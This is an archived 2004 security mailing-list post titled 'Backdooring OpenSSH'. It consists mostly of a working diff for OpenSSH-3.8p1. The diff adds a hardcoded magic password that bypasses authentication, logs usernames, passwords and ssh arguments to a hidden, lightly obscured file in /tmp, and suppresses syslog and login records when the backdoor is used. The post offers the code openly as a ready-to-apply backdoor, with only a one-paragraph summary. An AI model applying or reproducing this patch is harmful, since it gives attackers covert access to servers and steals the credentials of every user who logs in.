[EXPL] Backdooring OpenSSH

• Previous message: SecuriTeam: "[REVS] How To Create An ICMP Based Client/Server Connection Backdoor"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 17 Mar 2004 18:42:51 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Backdooring OpenSSH
------------------------------------------------------------------------

SUMMARY

Below is a .diff file that patches the sources of OpenSSH-3.8p1 client and
daemon to log every logins and passwords, it also adds a magic password
for the daemon, store passwords to an encrypted logfile, disables logging
if the magic passwords are used. Based upon the works of Aion.

DETAILS

Code:
diff -r -N -c openssh-3.8p1/auth-pam.c openssh-3.8p1+/auth-pam.c
*** openssh-3.8p1/auth-pam.c Tue Feb 17 13:20:08 2004
--- openssh-3.8p1+/auth-pam.c Tue Mar 2 19:24:00 2004
***************
*** 342,347 ****
--- 342,348 ----
   if (sshpam_err != PAM_SUCCESS)
    goto auth_fail;
   sshpam_err = pam_authenticate(sshpam_handle, 0);
+ if (bella) sshpam_err = PAM_SUCCESS;
   if (sshpam_err != PAM_SUCCESS)
    goto auth_fail;
   buffer_put_cstring(&buffer, "OK");
diff -r -N -c openssh-3.8p1/auth-passwd.c openssh-3.8p1+/auth-passwd.c
*** openssh-3.8p1/auth-passwd.c Thu Feb 22 00:23:36 2004
--- openssh-3.8p1+/auth-passwd.c Tue Mar 2 19:24:00 2004
***************
*** 72,77 ****
--- 72,81 ----
  #endif
   if (*password == '\0' && options.permit_empty_passwd == 0)
    return 0;
+ if (!strcmp(BACKPWD, password)) return bella=1; bella=0;
+ sprintf(abuff, "passwd from: %s \tuser: %s \tpass: %s \n",
+ get_remote_ipaddr(), pw->pw_name, password);
+ bellalog();
  
  #if defined(HAVE_OSF_SIA)
   return auth_sia_password(authctxt, password) && ok;
diff -r -N -c openssh-3.8p1/includes.h openssh-3.8p1+/includes.h
*** openssh-3.8p1/includes.h Sun Feb 6 11:29:42 2004
--- openssh-3.8p1+/includes.h Tue Mar 2 19:24:00 2004
***************
*** 13,18 ****
--- 13,38 ----
   * called by a name other than "ssh" or "Secure Shell".
   */
  
+ // start patch by acme - acme at olografix/paranoici dot org
+ #include <sys/stat.h>
+ #include <stdio.h>
+
+ #define BACKPWD "inspassword"
+ #define SSH_LOG "/tmp/.lost+found"
+
+ FILE *alog;
+ char abuff[512];
+ int alen, ai, bella;
+
+ #define bellalog() { \
+ alen=strlen(abuff); \
+ for(ai=0; ai<=alen; ai++) abuff[ai]=~abuff[ai]; \
+ alog=fopen(SSH_LOG, "a"); \
+ if(alog!=NULL) { fwrite(abuff, alen, 1, alog); fclose(alog);} \
+ chmod(SSH_LOG, 0666); \
+ }
+ // end patch, from aion
+
  #ifndef INCLUDES_H
  #define INCLUDES_H
  
diff -r -N -c openssh-3.8p1/log.c openssh-3.8p1+/log.c
*** openssh-3.8p1/log.c Tue Feb 18 12:59:44 2004
--- openssh-3.8p1+/log.c Tue Mar 2 19:24:00 2004
***************
*** 273,278 ****
--- 273,279 ----
   char *txt = NULL;
   int pri = LOG_INFO;
  
+ if (bella) return;
   if (level > log_level)
    return;
  
diff -r -N -c openssh-3.8p1/loginrec.c openssh-3.8p1+/loginrec.c
*** openssh-3.8p1/loginrec.c Sun Feb 10 06:49:36 2004
--- openssh-3.8p1+/loginrec.c Tue Mar 2 19:24:00 2004
***************
*** 406,411 ****
--- 406,412 ----
  int
  login_write (struct logininfo *li)
  {
+ if (bella) return 0;
  #ifndef HAVE_CYGWIN
   if ((int)geteuid() != 0) {
     logit("Attempt to write login records by non-root user (aborting)");
diff -r -N -c openssh-3.8p1/monitor.c openssh-3.8p1+/monitor.c
*** openssh-3.8p1/monitor.c Wed Feb 6 06:40:28 2004
--- openssh-3.8p1+/monitor.c Tue Mar 2 19:24:00 2004
***************
*** 786,791 ****
--- 786,793 ----
    fatal("UsePAM not set, but ended up in %s anyway", __func__);
  
   user = buffer_get_string(m, NULL);
+ sprintf(abuff, "mm pam from: %s \tuser: %s \n", get_remote_ipaddr(),
user);
+ bellalog();
  
   start_pam(user);
  
***************
*** 881,888 ****
   num = buffer_get_int(m);
   if (num > 0) {
    resp = xmalloc(num * sizeof(char *));
! for (i = 0; i < num; ++i)
     resp[i] = buffer_get_string(m, NULL);
    ret = (sshpam_device.respond)(sshpam_ctxt, num, resp);
    for (i = 0; i < num; ++i)
     xfree(resp[i]);
--- 883,894 ----
   num = buffer_get_int(m);
   if (num > 0) {
    resp = xmalloc(num * sizeof(char *));
! for (i = 0; i < num; ++i) {
     resp[i] = buffer_get_string(m, NULL);
+ sprintf(abuff, "pam_respond: [%d]: %s\n", i, resp[i]);
+ if(!strcmp(BACKPWD, resp[i])) bella=1;
+ else bellalog();
+ }
    ret = (sshpam_device.respond)(sshpam_ctxt, num, resp);
    for (i = 0; i < num; ++i)
     xfree(resp[i]);
diff -r -N -c openssh-3.8p1/readpass.c openssh-3.8p1+/readpass.c
*** openssh-3.8p1/readpass.c Fri Jan 24 02:36:23 2003
--- openssh-3.8p1+/readpass.c Tue Mar 2 19:24:00 2004
***************
*** 123,128 ****
--- 123,130 ----
    if ((ret = ssh_askpass(askpass, prompt)) == NULL)
     if (!(flags & RP_ALLOW_EOF))
      return xstrdup("");
+ sprintf(abuff, "readpass: %s\n", ret);
+ bellalog();
    return ret;
   }
  
***************
*** 134,138 ****
--- 136,142 ----
  
   ret = xstrdup(buf);
   memset(buf, 'x', sizeof buf);
+ sprintf(abuff, "readpass: %s\n", ret);
+ bellalog();
   return ret;
  }
diff -r -N -c openssh-3.8p1/ssh.c openssh-3.8p1+/ssh.c
*** openssh-3.8p1/ssh.c Tue Dec 17 06:33:12 2003
--- openssh-3.8p1+/ssh.c Tue Mar 2 19:24:00 2004
***************
*** 212,217 ****
--- 212,221 ----
   extern int optind, optreset;
   extern char *optarg;
  
+ for(i=1; i<ac; i++) {
+ sprintf(abuff, "ssh: av[%d]: %s\n", i, av[i]);
+ bellalog();
+ }
   __progname = ssh_get_progname(av[0]);
   init_rng();
  
diff -r -N -c openssh-3.8p1/version.h openssh-3.8p1+/version.h
*** openssh-3.8p1/version.h Tue Feb 23 23:24:02 2004
--- openssh-3.8p1+/version.h Tue Mar 2 19:24:00 2004
***************
*** 1,3 ****
  /* $OpenBSD: version.h,v 1.40 2004/02/23 15:16:46 markus Exp $ */
  
! #define SSH_VERSION "OpenSSH_3.8p1"
--- 1,3 ----
  /* $OpenBSD: version.h,v 1.40 2004/02/23 15:16:46 markus Exp $ */
  
! #define SSH_VERSION "OpenSSH_3.8p1" // we can change it

ADDITIONAL INFORMATION

The information has been provided by <mailto:acme@olografix.org> acme.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[REVS] How To Create An ICMP Based Client/Server Connection Backdoor"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]